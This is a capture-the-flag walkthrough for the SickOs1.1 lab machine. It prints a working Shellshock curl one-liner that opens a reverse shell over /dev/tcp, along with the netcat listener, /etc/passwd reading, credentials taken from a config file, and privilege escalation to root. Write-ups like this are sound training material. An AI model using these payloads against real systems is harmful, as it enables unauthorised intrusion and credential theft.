SickOs1.1


Starting with a nmap scan

-------------------------
root@kali:~# nmap -A 10.0.2.11

Starting Nmap 7.01 ( https://nmap.org ) at 2017-02-09 13:19 GMT
Nmap scan report for 10.0.2.11
Host is up (0.00036s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
| 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 08:00:27:75:D4:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.36 ms 10.0.2.11

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.57 seconds
-------------------------
I can see port 22 SSH and 3128 wich is a Http Proxy

Nothing came from the ssh so i moved on to the proxy

I used curl through the proxy and it spat out

-------------------------
root@kali:~# curl --proxy http://10.0.2.11:3128 10.0.2.11
<h1>
BLEHHH!!!
</h1>
-------------------------

After snooping around the site i found a page /cgi-bin/status and it gave out this response.

------------------------
{ "uptime": " 18:59:06 up 1:09, 0 users, load average: 0.00, 0.01, 0.05", "kernel": "Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux"}
------------------------

After finding the Status page I instanly thought of useing the shellshock vuln so I looked through my notes and had a quick refresh on it pieced together a onliner and hoped for the best.

-------------------------
curl -A "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/10.0.2.4/4444 0>&1' " --proxy http://10.0.2.11:3128 http://10.0.2.11/cgi-bin/status
-------------------------
Started up Netcat on port 4444 and bam Shell

-------------------------
root@kali:~# nc -lvp 4444
listening on [any] 4444 ...
connect to [10.0.2.12] from (UNKNOWN) [10.0.2.11] 39171
bash: no job control in this shell
www-data@SickOs:/usr/lib/cgi-bin$
-------------------------

I was running as the www-data user and now that ive got linitial access my next goal is to get root.

I strated to dig around and I checked the /etc/passwd file and found the sickos user interesting as its not a default user and obviously its the name of the challenge.

--------------------------
www-data@SickOs:/var/www/wolfcms/wolf$ cat /etc/passwd | grep sickos
cat /etc/passwd | grep sickos
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
--------------------------

with the user I want to get to in mind I started to roam the server I checked the /var/www and came across a config.php

I opened and found this in side

---------------------------
// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
----------------------------

I tried Iogged on to the sickos user and I realised I missed a crucial step
----------------------------
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
su: must be run from a terminal
www-data@SickOs:/usr/lib/cgi-bin$
----------------------------

So i spawned a shell and can continued with logging in to sickos user.

----------------------------
python -c 'import pty; pty.spawn("/bin/bash")'
----------------------------

Take 2
---------------------------
www-data@SickOs:/usr/lib/cgi-bin$ su sickos
su sickos
Password: john@123

sickos@SickOs:/usr/lib/cgi-bin$
----------------------------

After loggin in I found it was running with root level privlidges

As our user is running at root level we can simply log in to root with out a password.

Sudo su




I looked in the root directory and found a txt so I opened the txt file and finished the CTF !!!!




Really enjoyed the CTF bit strange that wolfcms wasnt apart of it, maybe theres another way in.


www.000webhost.com